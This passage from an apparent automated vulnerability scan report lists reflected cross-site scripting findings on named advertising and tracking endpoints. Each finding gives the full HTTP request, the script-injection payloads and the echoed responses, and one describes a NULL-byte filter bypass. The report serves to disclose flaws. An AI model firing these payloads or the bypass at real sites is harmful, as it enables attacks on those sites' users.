User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"9a60f<script>alert(1)</script>a2e90c8fffe", c10:"", c15:"", c16:"", r:""});

4.108. http://ct.buzzfeed.com/wd/UserWidget [or parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ct.buzzfeed.com
Path:	/wd/UserWidget

Issue detail

The value of the or request parameter is copied into the HTML document as plain text between tags. The payload 789e4<script>alert(1)</script>93295794946 was submitted in the or parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=ugo&to=1&or=vb789e4<script>alert(1)</script>93295794946&wid=1&cb=1307963919106 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 13 Jun 2011 11:24:15 GMT
Server: lighttpd bf1
Content-Length: 567

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb789e4<script>alert(1)</script>93295794946&wid=1&to=1&u=ugo - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb789e4<script>
...[SNIP]...

4.109. http://ct.buzzfeed.com/wd/UserWidget [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ct.buzzfeed.com
Path:	/wd/UserWidget

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload d39fa<script>alert(1)</script>d7d3318643e was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=ugod39fa<script>alert(1)</script>d7d3318643e&to=1&or=vb&wid=1&cb=1307963919106 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 13 Jun 2011 11:24:14 GMT
Server: lighttpd bf2
Content-Length: 567

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=ugod39fa<script>alert(1)</script>d7d3318643e - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=ugod39fa<script>
...[SNIP]...

4.110. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.chango.com
Path:	/collector/admeldpixel

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 177fe'%3balert(1)//07ba58728ca was submitted in the admeld_adprovider_id parameter. This input was echoed as 177fe';alert(1)//07ba58728ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333177fe'%3balert(1)//07ba58728ca&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "49c4a308dfe65dbd3ac4e7c0af8b7d2a30dd4888"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:46 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:46 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=333177fe';alert(1)//07ba58728ca&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.111. http://d.chango.com/collector/admeldpixel [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.chango.com
Path:	/collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72cb2'%3balert(1)//4971401eda9 was submitted in the admeld_callback parameter. This input was echoed as 72cb2';alert(1)//4971401eda9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match72cb2'%3balert(1)//4971401eda9 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "98f631aadac39f8db83e9b1ed3f92a6971c57a7c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:53 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:53 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match72cb2';alert(1)//4971401eda9?admeld_adprovider_id=333&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.112. http://d.chango.com/collector/admeldpixel [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.chango.com
Path:	/collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into the HTML document as plain text between tags. The payload ee556<script>alert(1)</script>f3ee7f5ea64 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=ee556<script>alert(1)</script>f3ee7f5ea64 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 141
Server: Chango RTB Server
Etag: "31a35ca3fcea637a6e5e79801983bd200a0b22ba"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:59 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:59 GMT; Path=/
Connection: close

(new Image()).src='ee556<script>alert(1)</script>f3ee7f5ea64?admeld_adprovider_id=333&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25201'%3balert(1)//a92075ae1b6 was submitted in the $ parameter. This input was echoed as 25201';alert(1)//a92075ae1b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=25201'%3balert(1)//a92075ae1b6&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:25201';alert(1)//a92075ae1b6;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:49 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:49 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',25201';alert(1)//a92075ae1b6';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,25201';alert(1)//a92075ae1b6;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasA
...[SNIP]...

4.114. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ec7"%3balert(1)//f012bdbb2c2 was submitted in the $ parameter. This input was echoed as 60ec7";alert(1)//f012bdbb2c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=60ec7"%3balert(1)//f012bdbb2c2&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:60ec7";alert(1)//f012bdbb2c2;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:48 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:48 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',60ec7";alert(1)//f012bdbb2c2';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,60ec7";alert(1)//f012bdbb2c2;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;

...[SNIP]...

4.115. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64836'%3balert(1)//5b6a7cc0c87 was submitted in the q parameter. This input was echoed as 64836';alert(1)//5b6a7cc0c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=64836'%3balert(1)//5b6a7cc0c87&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=69
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:43 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='64836';alert(1)//5b6a7cc0c87';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=64836';alert(1)//5b6a7cc0c87;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd
...[SNIP]...

4.116. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e08a9"%3balert(1)//5adc2ca10e9 was submitted in the q parameter. This input was echoed as e08a9";alert(1)//5adc2ca10e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=e08a9"%3balert(1)//5adc2ca10e9&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:42 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=70
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:42 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='e08a9";alert(1)//5adc2ca10e9';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=e08a9";alert(1)//5adc2ca10e9;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;

...[SNIP]...

4.117. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e72'%3balert(1)//ab02bc723ef was submitted in the $ parameter. This input was echoed as 25e72';alert(1)//ab02bc723ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=25e72'%3balert(1)//ab02bc723ef&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:25e72';alert(1)//ab02bc723ef;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',25e72';alert(1)//ab02bc723ef';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,25e72';alert(1)//ab02bc723ef;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasA
...[SNIP]...

4.118. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77d71"%3balert(1)//149bbdc5fd3 was submitted in the $ parameter. This input was echoed as 77d71";alert(1)//149bbdc5fd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=77d71"%3balert(1)//149bbdc5fd3&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
